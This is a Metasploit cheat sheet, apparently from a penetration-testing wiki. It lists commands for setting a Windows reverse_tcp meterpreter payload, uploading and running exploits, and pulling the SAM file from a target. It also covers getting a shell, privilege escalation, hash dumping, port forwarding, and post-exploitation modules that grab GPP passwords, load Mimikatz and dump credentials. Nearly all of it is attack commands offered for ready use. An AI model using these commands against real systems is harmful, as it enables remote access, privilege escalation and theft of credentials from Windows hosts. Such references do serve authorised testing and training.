Metasploit
Windows reverse meterpreter payload
set payload windows/meterpreter/reverse_tcp
Useful meterpreter commands.
Command | Description |
upload file c:\\windows | Meterpreter upload file to Windows target |
download c:\\windows\\repair\\sam /tmp | Meterpreter download file from Windows target |
download c:\\windows\\repair\\sam /tmp | Meterpreter download file from Windows target |
execute -f c:\\windows\temp\exploit.exe | Meterpreter run .exe on target - handy for executing uploaded exploits |
execute -f cmd -c | Creates new channel with cmd shell |
ps | Meterpreter show processes |
shell | Meterpreter get shell on the target |
getsystem | Meterpreter attempts priviledge escalation the target |
hashdump | Meterpreter attempts to dump the hashes on the target |
portfwd add –l 3389 –p 3389 –r target | Meterpreter create port forward to target machine |
portfwd delete –l 3389 –p 3389 –r target | Meterpreter delete port forward |
Post Exploit Windows Metasploit Modules
Windows Metasploit Modules for privilege escalation.
Command | Description |
run post/windows/gather/win_privs | Metasploit show privileges of current user |
use post/windows/gather/credentials/gpp | Metasploit grab GPP saved passwords |
load mimikatz -> wdigest | Metasploit load Mimikatz |
run post/windows/gather/local_admin_search_enum | Identify other machines that the supplied domain user has administrative access to |
run post/windows/gather/smart_hashdump | dump credentials |
Last updated